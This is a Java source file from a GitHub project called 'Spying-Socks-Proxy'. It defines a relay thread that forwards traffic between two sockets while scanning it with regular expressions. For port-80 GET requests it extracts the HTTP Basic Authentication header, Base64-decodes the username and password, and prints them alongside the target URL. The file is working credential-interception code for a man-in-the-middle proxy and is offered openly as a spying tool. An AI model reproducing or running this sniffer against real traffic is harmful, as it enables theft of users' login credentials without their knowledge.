Spying-Socks-Proxy/DataThread.java at master · dolevb13/Spying-Socks-Proxy · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
import java.io.*;
import java.net.*;
import java.util.*;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class DataThread extends Thread {
	Socket one;
	Socket two;
	InputStream oneInput;
	OutputStream twoOutput;
	byte[] packet;

	public DataThread(Socket one, Socket two, InputStream oneInput, OutputStream twoOutput) {
		this.one = one;
		this.two = two;
		this.oneInput = oneInput;
		this.twoOutput = twoOutput;
	}

	@Override
	public void run() {
		try {
			if (!one.isClosed())
				checkHttp();
		} catch (Exception e) {
			System.out.println("Exception in RunThread.run(): " + e.getMessage());
		}
	}

	/**
	 * Check for password passed using HTTP Basic Authentication,
	 * only in connections where the destination is on port 80 and the HTTP method is GET.
	 */
	public void checkHttp() {
		String requestMethod = "";
		String password = "";
		String subDomain = "";
		String url = "";
		int countRead;
		packet = new byte[4096];
		try {
			oneInput = one.getInputStream();
			while ((countRead = oneInput.read(packet)) != -1) {
				String packetS = new String(packet);
				Pattern pGet = Pattern.compile("(GET)[ ]*([^ ])+[ ]*(HTTP)");
				Pattern pPassword = Pattern.compile("(Authorization)[:][ ](.*)[ ]([\\S]*)");
				Pattern pUrl = Pattern
						.compile("(Host)[:][ ]((http)://)?([-a-zA-Z0-9+&@#/%?=_|!:,.;]*[-a-zA-Z0-9+&@#/%=_|])");

				Matcher mGet = pGet.matcher(packetS);
				Matcher mPassword = pPassword.matcher(packetS);
				Matcher mUrl = pUrl.matcher(packetS);
				if (mGet.find()) {
					requestMethod = mGet.group(1); // GET
					subDomain = mGet.group(2);
				}
				if (mPassword.find()) {
					password = mPassword.group(3);
				}
				if (mUrl.find()) {
					url = mUrl.group(4);
				}
				if ((one.getPort() == 80 || two.getPort() == 80) && requestMethod.equals("GET")) {
					byte[] arr = Base64.getDecoder().decode(password);
					System.out.println("Password Found! http://" + new String(arr) + "@" + url + subDomain);

				}
				twoOutput.write(packet, 0, countRead);
			}
		} catch (SocketTimeoutException e2) {

		} catch (Exception e) {
			System.err.println("Error getting client's data: " + e.getMessage());
		}
	}
}